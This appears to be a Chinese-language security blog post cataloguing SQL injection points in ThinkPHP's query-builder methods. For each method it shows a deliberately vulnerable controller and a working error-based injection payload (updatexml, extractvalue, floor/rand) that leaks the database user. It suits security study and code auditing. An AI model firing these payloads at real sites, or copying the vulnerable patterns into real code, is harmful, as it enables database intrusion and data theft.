注入

一、where注入

1、语句

    public function index(){

		$data = M('user')->where('id='.I('id'))->find();
		dump($data);
    }

2、报错注入

and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#

3、解决方案

用数组条件查询

    public function index(){
		
		$User = M("User");
		$map['id'] = I('id');
		$User->where($map)->select();
    }

二、table注入

1、语句

public function index(){
      M()->table(I('tab'))->where('1=1')->find();
}


2、报错注入

where 1=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#

三、field注入

1、语句

public function index(){
      //查询id和username字段,name是username的别名,别名可控,产生注入
      M('User')->field(array('id','username'=>I('name')))->select();
}

2、报错注入

//查询的表名可控,拼接语句
from thinkphp_user where 1=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#

四、order注入

1、语句

public function index(){

      M('User')->where('1=1')->order(array('id'=>I('orderby')))->select();
}

SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) ORDER BY `id` a

2、报错注入

and (updatexml(1,concat(0x7e,(select user())),0))#

五、group注入

1、语句

    public function index(){

		$data = M('User')->field('max(id),username')->group(I('id'))->select();
    }

SELECT max(id),`username` FROM `thinkphp_user` GROUP BY I('id')

2、报错注入

and (updatexml(1,concat(0x7e,(select user())),0))#

(select 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(user())),1,62)))a from information_schema.tables group by a)b)#


六、having注入

1、语句

//having,过滤I('id')参数
public function index(){

	$data = M('User')->field('max(id),username')->group(I('id'))->having(I('having'))->select();
	dump($data);
}

2、报错注入

(select 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(user())),1,62)))a from information_schema.tables group by a)b)#

七、comment注入

1、语句

public function index(){

	M('User')->comment(I('com'))->where('1=1')->find();
}

2、报错注入

*/ procedure analyse(extractvalue(rand(),concat(0x3a,user())),1);#

八、索引注入(thinkhphp3版本不存在,thinkphp5.0存在)

1、语句

public function index(){

	$data = M('User')->force(I('f'))->select();
	dump($data);
}

2、报错注入

) procedure analyse(extractvalue(rand(),concat(0x3a,user())),1);#

九、聚合方法

1、语句

    public function index(){

		$data = M('User')->count(I('f'));
		dump($data);
    }

SELECT COUNT(*) AS tp_count FROM `thinkphp_user` LIMIT 1

2、报错注入

*) AS tp_count FROM `thinkphp_user` where 1=1 and (updatexml(1,concat(0x7e,(select user())),0))#)

posted @ 2020-12-09 17:45  lnterpreter  阅读(307)  评论(0编辑  收藏  举报